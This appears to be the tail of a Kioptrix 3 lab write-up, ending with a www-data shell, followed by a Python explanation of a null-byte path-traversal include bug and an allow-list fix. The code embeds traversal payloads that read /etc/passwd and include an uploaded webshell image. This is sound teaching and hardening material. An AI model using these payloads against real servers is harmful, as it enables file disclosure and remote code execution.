Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
15:10:15 up 2:59, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
loneferr pts/0 192.168.84.135 12:27 21:13m 4.66s 0.01s sshd: loneferre
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ pwd
/
$ whoami
www-data
$

Slick!!!

Sorry, this time I still could not find that Greek master's idiot-proof one-click script that clears the box, I am so sorry about this... It's a pity...

The end, to be continued...
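Two separate defects make this chain work: the application builds an include path from `system=` without validation, and PHP 5.2.4 (the version in the server banner) still truncated file names at a NUL byte, so the `%00` discards whatever extension follows it. The Python below is an added example, not LotusCMS code: the include scheme (`core/<name>.html`) is an assumption chosen to make the mechanics visible, the web root is the one visible in the upload URL above, and the payloads are the two requests from this section plus the legitimate `system=Admin` seen in the nmap output. It also shows the allow-list plus containment check that would have rejected both malicious requests.

```python
"""Null-byte truncation + path traversal in an include(), and the fix.
Added example; the include scheme and page directory are assumptions."""
import posixpath
import re
from urllib.parse import unquote

WEBROOT = "/home/www/kioptrix3.com"     # from the upload URL in the write-up
PAGE_DIR = WEBROOT + "/core"             # assumed location of the page templates

# The two requests sent in this section (URL-encoded, as typed) and a legitimate value.
PAYLOADS = {
    "passwd":   "../../../../../../../etc/passwd%00.html",
    "webshell": "../../../../../../../home/www/kioptrix3.com/gallery/photos/x281lo68jw.jpg%00.html",
    "legit":    "Admin",
}


def c_string(path: str) -> str:
    """PHP < 5.3.4 handed file names to libc as NUL-terminated strings, so
    everything from the first \\x00 onward silently disappeared."""
    return path.split("\x00", 1)[0]


def vulnerable_resolve(system_param: str) -> str:
    """The pattern behind the bug: decode, concatenate, include.

    The appended ".html" was meant to pin the file type; the NUL byte removes
    it, and "../" walks out of PAGE_DIR.  normpath shows the path the kernel saw.
    """
    raw = unquote(system_param)                       # "%00" -> "\x00"
    return posixpath.normpath(c_string(PAGE_DIR + "/" + raw + ".html"))


PAGE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")


def safe_resolve(system_param: str):
    """Allow-list the name, then prove the final path stays inside PAGE_DIR.

    Returns None for anything that must be rejected.  Both checks are kept:
    the allow-list is what stops traversal and NUL bytes; the containment
    check is a second fence in case the allow-list is ever loosened.
    """
    raw = unquote(system_param)
    if not PAGE_NAME.fullmatch(raw):
        return None
    path = posixpath.normpath(PAGE_DIR + "/" + raw + ".html")
    if posixpath.commonpath([PAGE_DIR, path]) != PAGE_DIR:
        return None
    return path


if __name__ == "__main__":
    for name, payload in PAYLOADS.items():
        print(f"{name:9} vulnerable -> {vulnerable_resolve(payload)}")
        print(f"{'':9} hardened   -> {safe_resolve(payload)}")
```

Once arbitrary files can be included, the upload filter's extension check is irrelevant: include() executes PHP found in a .jpg. The fix therefore has to be on the include side; renaming uploads or filtering %00 at the edge only treats the symptom.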